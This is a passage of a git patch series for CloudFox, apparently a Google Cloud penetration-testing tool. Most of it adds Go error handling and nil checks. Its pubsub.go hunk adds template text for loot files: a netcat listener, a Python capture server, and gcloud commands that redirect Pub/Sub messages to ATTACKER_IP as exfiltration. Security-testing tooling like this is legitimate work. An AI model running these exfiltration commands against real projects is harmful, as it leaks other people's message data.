{ + _, err := f.WriteString(strings.Join(row, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// closeAll closes all open file handles +func (w *teeStreamWriter) closeAll() { + if w.orgCSV != nil { + w.orgCSV.Close() + } + if w.orgJSON != nil { + w.orgJSON.Close() + } + if w.orgTable != nil { + w.orgTable.Close() + } + + for _, f := range w.projectCSV { + if f != nil { + f.Close() + } + } + for _, f := range w.projectJSON { + if f != nil { + f.Close() + } + } + for _, f := range w.projectTable { + if f != nil { + f.Close() + } + } +} From a8e802404fd9178a66e91d1f64c92b714372e9dd Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 20 Feb 2026 08:31:44 -0500 Subject: [PATCH 40/48] code cleanup --- gcp/commands/appengine.go | 19 +++-- gcp/commands/beyondcorp.go | 14 +++- gcp/commands/cloudsql.go | 8 +++ gcp/commands/dataexfiltration.go | 6 ++ gcp/commands/endpoints.go | 70 +++++++++++++------ gcp/commands/foxmapper.go | 14 ++-- gcp/commands/functions.go | 40 ++++------- gcp/commands/loadbalancers.go | 12 +++- gcp/commands/monitoringalerts.go | 1 + gcp/commands/networktopology.go | 7 +- gcp/commands/notebooks.go | 9 ++- gcp/commands/publicaccess.go | 10 ++- gcp/commands/pubsub.go | 43 +++++++++++- gcp/commands/serviceagents.go | 6 +- gcp/commands/vpcnetworks.go | 18 ++++- gcp/commands/whoami.go | 8 ++- gcp/services/apikeysService/apikeysService.go | 13 +--- .../artifactRegistryService.go | 12 +++- .../bigtableService/bigtableService.go | 8 +-- .../cloudbuildService/cloudbuildService.go | 4 +- .../composerService/composerService.go | 7 +- .../dataflowService/dataflowService.go | 6 +- .../foxmapperService/foxmapperService.go | 7 +- gcp/services/kmsService/kmsService.go | 3 +- gcp/services/networkService/networkService.go | 4 +- .../resourceIAMService/resourceIAMService.go | 23 ++++-- gcp/services/spannerService/spannerService.go | 6 +- gcp/services/vpcscService/vpcscService.go | 5 ++ 28 files changed, 270 insertions(+), 113 deletions(-) diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index 44795a7a..f455c76f 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -586,11 +586,20 @@ func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngi app.LocationID, app.ServingStatus, app.DefaultHostname, - "No services deployed", - "", "", "", "", "", - app.ServiceAccount, - "-", // Priv Esc - "", "", "", "", "", "", + "No services deployed", // Service + "-", // Version + "-", // Runtime + "-", // Environment + "-", // Ingress + "-", // Public + app.ServiceAccount, // Service Account + "-", // SA Attack Paths + "-", // Default SA + "-", // Deprecated + "-", // Env Vars + "-", // Secrets + "-", // VPC Connector + "-", // URL }) } } diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go index dda9e2d2..466479bc 100644 --- a/gcp/commands/beyondcorp.go +++ b/gcp/commands/beyondcorp.go @@ -130,13 +130,23 @@ func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, m.mu.Unlock() // Get app connectors - connectors, _ := svc.ListAppConnectors(projectID) + connectors, err := svc.ListAppConnectors(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BEYONDCORP_MODULE_NAME, + fmt.Sprintf("Could not list app connectors in project %s", projectID)) + } m.mu.Lock() m.ProjectAppConnectors[projectID] = connectors m.mu.Unlock() // Get app connections - connections, _ := svc.ListAppConnections(projectID) + connections, err := svc.ListAppConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BEYONDCORP_MODULE_NAME, + fmt.Sprintf("Could not list app connections in project %s", projectID)) + } m.mu.Lock() m.ProjectAppConnections[projectID] = connections for _, conn := range connections { diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index c36f01f3..7307f43a 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -249,6 +249,14 @@ func (m *CloudSQLModule) addInstanceToLoot(projectID string, instance CloudSQLSe ) } + // Surface security issues if any were detected + if len(instance.SecurityIssues) > 0 { + lootFile.Contents += "# Security Issues:\n" + for _, issue := range instance.SecurityIssues { + lootFile.Contents += fmt.Sprintf("# - %s\n", issue) + } + } + lootFile.Contents += "\n" } diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 2b1eb7dd..2655a81f 100755 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -1471,7 +1471,13 @@ func (m *DataExfiltrationModule) foxMapperFindingsToTableBodyForProject(projectI } } + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + body = append(body, []string{ + scopeType, principalProject, principalType, p.Principal, diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index ac27ba04..9ae3a094 100755 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -209,7 +209,7 @@ func (m *EndpointsModule) processProject(ctx context.Context, projectID string, func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { // Global addresses req := svc.GlobalAddresses.List(projectID) - _ = req.Pages(ctx, func(page *compute.AddressList) error { + if err := req.Pages(ctx, func(page *compute.AddressList) error { for _, addr := range page.Items { if addr.AddressType == "EXTERNAL" { user := "" @@ -238,11 +238,14 @@ func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global addresses in project %s", projectID)) + } // Regional addresses - use AggregatedList to avoid needing compute.regions.list permission addrReq := svc.Addresses.AggregatedList(projectID) - _ = addrReq.Pages(ctx, func(page *compute.AddressAggregatedList) error { + if err := addrReq.Pages(ctx, func(page *compute.AddressAggregatedList) error { for scopeName, scopedList := range page.Items { if scopedList.Addresses == nil { continue @@ -281,13 +284,16 @@ func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regional addresses in project %s", projectID)) + } } // getInstanceIPs retrieves instances with both external and internal IPs func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { req := svc.Instances.AggregatedList(projectID) - _ = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + if err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { for zone, scopedList := range page.Items { if scopedList.Instances == nil { continue @@ -356,7 +362,10 @@ func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Servi } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list instances in project %s", projectID)) + } } // getPortsForInstance determines open ports for an instance based on firewall rules @@ -396,7 +405,7 @@ func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { // Regional forwarding rules req := svc.ForwardingRules.AggregatedList(projectID) - _ = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + if err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { for region, scopedList := range page.Items { if scopedList.ForwardingRules == nil { continue @@ -453,11 +462,14 @@ func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Ser } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regional forwarding rules in project %s", projectID)) + } // Global forwarding rules globalReq := svc.GlobalForwardingRules.List(projectID) - _ = globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { + if err := globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { for _, rule := range page.Items { if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { ports := "ALL" @@ -489,14 +501,17 @@ func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Ser } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global forwarding rules in project %s", projectID)) + } } // getVPNGateways retrieves VPN gateway external IPs func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { // Classic VPN Gateways req := svc.TargetVpnGateways.AggregatedList(projectID) - _ = req.Pages(ctx, func(page *compute.TargetVpnGatewayAggregatedList) error { + if err := req.Pages(ctx, func(page *compute.TargetVpnGatewayAggregatedList) error { for region, scopedList := range page.Items { if scopedList.TargetVpnGateways == nil { continue @@ -521,11 +536,14 @@ func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Servi } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list classic VPN gateways in project %s", projectID)) + } // HA VPN Gateways haReq := svc.VpnGateways.AggregatedList(projectID) - _ = haReq.Pages(ctx, func(page *compute.VpnGatewayAggregatedList) error { + if err := haReq.Pages(ctx, func(page *compute.VpnGatewayAggregatedList) error { for region, scopedList := range page.Items { if scopedList.VpnGateways == nil { continue @@ -551,13 +569,16 @@ func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Servi } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list HA VPN gateways in project %s", projectID)) + } } // getCloudNAT retrieves Cloud NAT external IPs func (m *EndpointsModule) getCloudNAT(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { req := svc.Routers.AggregatedList(projectID) - _ = req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + if err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error { for region, scopedList := range page.Items { if scopedList.Routers == nil { continue @@ -583,14 +604,17 @@ func (m *EndpointsModule) getCloudNAT(ctx context.Context, svc *compute.Service, } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud NAT routers in project %s", projectID)) + } } // getPrivateServiceConnect retrieves Private Service Connect endpoints func (m *EndpointsModule) getPrivateServiceConnect(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { // Service Attachments (producer side) saReq := svc.ServiceAttachments.AggregatedList(projectID) - _ = saReq.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + if err := saReq.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { for region, scopedList := range page.Items { if scopedList.ServiceAttachments == nil { continue @@ -611,7 +635,10 @@ func (m *EndpointsModule) getPrivateServiceConnect(ctx context.Context, svc *com } } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list service attachments in project %s", projectID)) + } } // getCloudRunServices retrieves Cloud Run services @@ -1098,7 +1125,7 @@ func (m *EndpointsModule) getPubSubPushEndpoints(ctx context.Context, projectID // analyzeFirewallRules analyzes firewall rules and builds port mapping func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { req := svc.Firewalls.List(projectID) - _ = req.Pages(ctx, func(page *compute.FirewallList) error { + if err := req.Pages(ctx, func(page *compute.FirewallList) error { for _, fw := range page.Items { if fw.Direction != "INGRESS" { continue @@ -1127,7 +1154,10 @@ func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute m.mu.Unlock() } return nil - }) + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list firewall rules in project %s", projectID)) + } } // addEndpoint adds an endpoint thread-safely diff --git a/gcp/commands/foxmapper.go b/gcp/commands/foxmapper.go index 7285f5ff..b594986e 100755 --- a/gcp/commands/foxmapper.go +++ b/gcp/commands/foxmapper.go @@ -507,9 +507,9 @@ func (m *FoxMapperModule) generateLootContentForProject(projectID string, fm *fo // printProjectSummary prints a summary for a single project func (m *FoxMapperModule) printProjectSummary(logger internal.Logger, projectID string, summary map[string]interface{}) { - totalNodes := summary["total_nodes"].(int) - adminNodes := summary["admin_nodes"].(int) - nodesWithPrivesc := summary["nodes_with_privesc"].(int) + totalNodes, _ := summary["total_nodes"].(int) + adminNodes, _ := summary["admin_nodes"].(int) + nodesWithPrivesc, _ := summary["nodes_with_privesc"].(int) logger.InfoM(fmt.Sprintf("[%s] %d principals, %d admins, %d with privesc path", projectID, totalNodes, adminNodes, nodesWithPrivesc), "foxmapper") @@ -774,9 +774,9 @@ func (m *FoxMapperModule) generateLootContent(identifier string) string { } func (m *FoxMapperModule) printSummary(logger internal.Logger, identifier string) { - totalNodes := m.Summary["total_nodes"].(int) - adminNodes := m.Summary["admin_nodes"].(int) - nodesWithPrivesc := m.Summary["nodes_with_privesc"].(int) + totalNodes, _ := m.Summary["total_nodes"].(int) + adminNodes, _ := m.Summary["admin_nodes"].(int) + nodesWithPrivesc, _ := m.Summary["nodes_with_privesc"].(int) logger.InfoM(fmt.Sprintf("Analysis complete for: %s", identifier), "foxmapper") logger.InfoM(fmt.Sprintf("Total principals: %d", totalNodes), "foxmapper") @@ -784,7 +784,7 @@ func (m *FoxMapperModule) printSummary(logger internal.Logger, identifier string logger.InfoM(fmt.Sprintf("Principals with path to admin: %d", nodesWithPrivesc), "foxmapper") if nodesWithPrivesc > 0 { - percent := m.Summary["percent_with_privesc"].(float64) + percent, _ := m.Summary["percent_with_privesc"].(float64) logger.InfoM(fmt.Sprintf("Percent with privesc: %.1f%%", percent), "foxmapper") } diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index e6110392..b209433a 100755 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -1,12 +1,13 @@ package commands import ( - "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" "sync" + "github.com/BishopFox/cloudfox/gcp/shared" + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -164,10 +165,6 @@ func (m *FunctionsModule) processProject(ctx context.Context, projectID string, Name: "functions-commands", Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } - m.LootMap[projectID]["functions-env-vars"] = &internal.LootFile{ - Name: "functions-env-vars", - Contents: "# Cloud Functions Environment Variables\n# Generated by CloudFox\n# Variable names that may hint at secrets\n\n", - } m.LootMap[projectID]["functions-secrets"] = &internal.LootFile{ Name: "functions-secrets", Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", @@ -189,7 +186,6 @@ func (m *FunctionsModule) processProject(ctx context.Context, projectID string, // ------------------------------ func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsService.FunctionInfo) { commandsLoot := m.LootMap[projectID]["functions-commands"] - envVarsLoot := m.LootMap[projectID]["functions-env-vars"] secretsLoot := m.LootMap[projectID]["functions-secrets"] if commandsLoot == nil { @@ -198,7 +194,7 @@ func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsServic // All commands for this function commandsLoot.Contents += fmt.Sprintf( - "## Function: %s (Project: %s, Region: %s)\n"+ + "#### Function: %s (Project: %s, Region: %s)\n"+ "# Runtime: %s, Trigger: %s\n"+ "# Service Account: %s\n"+ "# Public: %v, Ingress: %s\n", @@ -254,19 +250,7 @@ func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsServic commandsLoot.Contents += "\n" - // Environment variable names (keep separate - useful for secret hunting) - if len(fn.EnvVarNames) > 0 && envVarsLoot != nil { - envVarsLoot.Contents += fmt.Sprintf( - "## Function: %s (Project: %s)\n", - fn.Name, fn.ProjectID, - ) - for _, varName := range fn.EnvVarNames { - envVarsLoot.Contents += fmt.Sprintf("## - %s\n", varName) - } - envVarsLoot.Contents += "\n" - } - - // Secret references (keep separate - useful for secret hunting) + // Secret references if (len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0) && secretsLoot != nil { secretsLoot.Contents += fmt.Sprintf( "## Function: %s (Project: %s)\n", @@ -389,7 +373,6 @@ func (m *FunctionsModule) writeFlatOutput(ctx context.Context, logger internal.L // isEmptyLootFile checks if a loot file contains only the header func isEmptyLootFile(contents string) bool { return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || - strings.HasSuffix(contents, "# Variable names that may hint at secrets\n\n") || strings.HasSuffix(contents, "# Secrets used by functions (names only)\n\n") || strings.HasSuffix(contents, "# Generated by CloudFox\n\n") } @@ -492,11 +475,10 @@ func isFunctionSensitiveEnvVar(envName string) string { func (m *FunctionsModule) getTableHeader() []string { return []string{ "Project", - "Type", "Name", "Region", - "State", "Runtime", + "State", "Trigger", "URL", "Ingress", @@ -526,6 +508,12 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func url = fn.TriggerURL } + // Format state + state := fn.State + if state == "" { + state = "-" + } + // Format VPC access (renamed from VPC Connector for consistency with Cloud Run) vpcAccess := "-" if fn.VPCConnector != "" { @@ -564,11 +552,10 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func for _, binding := range fn.IAMBindings { body = append(body, []string{ m.GetProjectName(fn.ProjectID), - "Function", fn.Name, fn.Region, - fn.State, fn.Runtime, + state, triggerInfo, url, ingress, @@ -585,11 +572,10 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func // Function has no IAM bindings - single row body = append(body, []string{ m.GetProjectName(fn.ProjectID), - "Function", fn.Name, fn.Region, - fn.State, fn.Runtime, + state, triggerInfo, url, ingress, diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index 39190620..dad182ef 100755 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -147,7 +147,11 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri // Get SSL policies sslPolicies, err := svc.ListSSLPolicies(projectID) - if err == nil { + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list SSL policies in project %s", projectID)) + } else { m.mu.Lock() m.ProjectSSLPolicies[projectID] = sslPolicies m.mu.Unlock() @@ -155,7 +159,11 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri // Get backend services backends, err := svc.ListBackendServices(projectID) - if err == nil { + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list backend services in project %s", projectID)) + } else { m.mu.Lock() m.ProjectBackendServices[projectID] = backends m.mu.Unlock() diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go index 3b99776c..844ea12c 100644 --- a/gcp/commands/monitoringalerts.go +++ b/gcp/commands/monitoringalerts.go @@ -409,6 +409,7 @@ func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, proj Name: check.Name, DisplayName: check.DisplayName, ProjectID: projectID, + Enabled: !check.IsInternal, // Active checks returned by API are enabled; internal checks are system-managed } // Parse resource type diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index 03f3f8fd..88d65441 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -301,7 +301,12 @@ func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID ProjectID: projectID, SelfLink: network.SelfLink, Description: network.Description, - RoutingMode: network.RoutingConfig.RoutingMode, + RoutingMode: func() string { + if network.RoutingConfig != nil { + return network.RoutingConfig.RoutingMode + } + return "" + }(), AutoCreateSubnets: network.AutoCreateSubnetworks, MTU: network.Mtu, CreationTimestamp: network.CreationTimestamp, diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 1c78a25c..cda8fe5a 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -136,9 +136,14 @@ func (m *NotebooksModule) processProject(ctx context.Context, projectID string, m.mu.Unlock() } - // Get runtimes + // Get runtimes (might not be available in all projects) runtimes, err := svc.ListRuntimes(projectID) - if err == nil { + if err != nil { + // Don't increment error counter - runtimes API may not be enabled + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list runtimes in project %s (may not be enabled)", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + } else { m.mu.Lock() m.ProjectRuntimes[projectID] = runtimes m.mu.Unlock() diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go index 6aa6ea1d..1426e206 100644 --- a/gcp/commands/publicaccess.go +++ b/gcp/commands/publicaccess.go @@ -826,6 +826,14 @@ func hasPublicDataflowConfig(job *dataflow.Job) bool { return false } +// getClusterState safely extracts cluster state, handling nil Status +func getClusterState(cluster *dataproc.Cluster) string { + if cluster.Status != nil { + return cluster.Status.State + } + return "UNKNOWN" +} + // checkDataprocClusters checks Dataproc clusters for public access func (m *PublicAccessModule) checkDataprocClusters(ctx context.Context, projectID string, logger internal.Logger) { dpService, err := dataproc.NewService(ctx) @@ -857,7 +865,7 @@ func (m *PublicAccessModule) checkDataprocClusters(ctx context.Context, projectI Location: region, AccessLevel: member, Role: binding.Role, - AdditionalInfo: fmt.Sprintf("Status: %s", cluster.Status.State), + AdditionalInfo: fmt.Sprintf("Status: %s", getClusterState(cluster)), } m.addResource(resource) } diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index c6a3085c..4c8659a3 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -292,6 +292,25 @@ gcloud pubsub topics publish %s --message='test' --attribute='key1=value1,key2=v # Create a new subscription to eavesdrop on messages (requires pubsub.subscriptions.create) # gcloud pubsub subscriptions create attacker-sub-%s --topic=%s --project=%s +# === NETCAT / WEBHOOK CAPTURE === + +# Step 1: Start a listener on your attacker host (e.g., a VM with a public IP) +# nc -lk 4444 +# Or use a simple HTTP server to see full requests: +# python3 -c "from http.server import HTTPServer, BaseHTTPRequestHandler; import json +# class H(BaseHTTPRequestHandler): +# def do_POST(self): +# data = self.rfile.read(int(self.headers['Content-Length'])) +# print(json.dumps({'headers': dict(self.headers), 'body': data.decode()}, indent=2)) +# self.send_response(200); self.end_headers() +# HTTPServer(('0.0.0.0', 8080), H).serve_forever()" + +# Step 2: Create a push subscription pointed at your listener (requires pubsub.subscriptions.create) +# gcloud pubsub subscriptions create exfil-sub-%s --topic=%s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" + +# All new messages published to this topic will be POSTed to your listener as JSON +# The message body is base64-encoded in the POST payload under .message.data + `, topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, @@ -302,6 +321,7 @@ gcloud pubsub topics publish %s --message='test' --attribute='key1=value1,key2=v topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, topic.Name, topic.Name, topic.ProjectID, + topic.Name, topic.Name, topic.ProjectID, ) } @@ -417,6 +437,23 @@ gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack # Pull and save to file # gcloud pubsub subscriptions pull %s --project=%s --limit=1000 --format=json > messages.json +# === NETCAT / WEBHOOK CAPTURE === + +# Convert this subscription to push mode and redirect messages to your listener (requires pubsub.subscriptions.update) +# Step 1: Start a listener on your attacker host +# nc -lk 4444 +# Or use a Python HTTP server: +# python3 -c "from http.server import HTTPServer, BaseHTTPRequestHandler; import json +# class H(BaseHTTPRequestHandler): +# def do_POST(self): +# data = self.rfile.read(int(self.headers['Content-Length'])) +# print(json.dumps({'headers': dict(self.headers), 'body': data.decode()}, indent=2)) +# self.send_response(200); self.end_headers() +# HTTPServer(('0.0.0.0', 8080), H).serve_forever()" +# Step 2: Set push endpoint on this subscription +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" +# Messages will be POSTed as JSON with base64-encoded data in .message.data + # === SNAPSHOT & SEEK ATTACKS === # Create a snapshot of current subscription state (requires pubsub.snapshots.create) @@ -449,8 +486,10 @@ gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack # Current push endpoint: %s # Push SA: %s -# Modify push endpoint to redirect messages to attacker-controlled server (requires pubsub.subscriptions.update) -# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://attacker.com/webhook" +# Redirect messages to attacker listener (requires pubsub.subscriptions.update) +# Step 1: Start listener: nc -lk 4444 (or python3 HTTP server on port 8080) +# Step 2: Modify push endpoint: +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" # Remove push config (convert to pull subscription for easier exfiltration) # gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="" diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index 1a692059..f6340886 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -140,9 +140,9 @@ func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID stri svc := serviceagentsservice.New() agents, err := svc.GetServiceAgents(projectID, m.OrgCache) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting service agents: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEAGENTS_MODULE_NAME, + fmt.Sprintf("Could not get service agents in project %s", projectID)) return } diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index 595ca56b..4c6adc47 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -149,7 +149,11 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string // Get subnets subnets, err := svc.ListSubnets(projectID) - if err == nil { + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list subnets in project %s", projectID)) + } else { m.mu.Lock() m.ProjectSubnets[projectID] = subnets for _, subnet := range subnets { @@ -160,7 +164,11 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string // Get peerings peerings, err := svc.ListVPCPeerings(projectID) - if err == nil { + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC peerings in project %s", projectID)) + } else { m.mu.Lock() m.ProjectPeerings[projectID] = peerings for _, peering := range peerings { @@ -171,7 +179,11 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string // Get routes routes, err := svc.ListRoutes(projectID) - if err == nil { + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list routes in project %s", projectID)) + } else { m.mu.Lock() m.ProjectRoutes[projectID] = routes m.mu.Unlock() diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 3b3aa976..b0fb5b19 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -884,20 +884,22 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, rel for _, path := range finding.Paths { // Build command from first edge if available command := "" + permission := "" if len(path.Edges) > 0 { command = generatePrivescCommandFromEdge(path.Edges[0]) + permission = path.Edges[0].ShortReason } privEscPath := PrivilegeEscalationPath{ ProjectID: "", // FoxMapper doesn't track project per edge - Permission: path.Edges[0].ShortReason, + Permission: permission, Category: "Privesc", Description: fmt.Sprintf("Can escalate to %s admin via %d-hop path", path.AdminLevel, path.HopCount), SourceRole: finding.Principal, SourceScope: path.AdminLevel, Command: command, Confidence: "confirmed", - RequiredPerms: path.Edges[0].ShortReason, + RequiredPerms: permission, } if path.ScopeBlocked { @@ -920,7 +922,7 @@ func generatePrivescCommandFromEdge(edge foxmapperservice.Edge) string { return "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA" } else if strings.Contains(reason, "iam.serviceaccounts.actas") { return "# Use actAs to run services as the target SA" - } else if strings.Contains(reason, "setiamdolicy") { + } else if strings.Contains(reason, "setiampolicy") { return "# Modify IAM policy to grant yourself additional permissions" } else if strings.Contains(reason, "cloudfunctions") { return "gcloud functions deploy FUNC --runtime=python311 --service-account=TARGET_SA" diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go index 64e23e8c..1353e536 100644 --- a/gcp/services/apikeysService/apikeysService.go +++ b/gcp/services/apikeysService/apikeysService.go @@ -6,15 +6,11 @@ import ( "strings" "time" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" apikeys "google.golang.org/api/apikeys/v2" ) -var logger internal.Logger - type APIKeysService struct { session *gcpinternal.SafeSession } @@ -293,13 +289,10 @@ func (s *APIKeysService) ListAPIKeysWithKeyStrings(projectID string) ([]APIKeyIn for i := range keys { keyString, err := s.GetKeyString(keys[i].Name) if err != nil { - // Log but don't fail - we might not have permission - parsedErr := gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") - gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_APIKEYS_MODULE_NAME, - fmt.Sprintf("Could not get key string for %s", keys[i].Name)) - } else { - keys[i].KeyString = keyString + // Skip - we might not have permission to get key strings + continue } + keys[i].KeyString = keyString } return keys, nil diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 541e634b..108ecf88 100644 --- 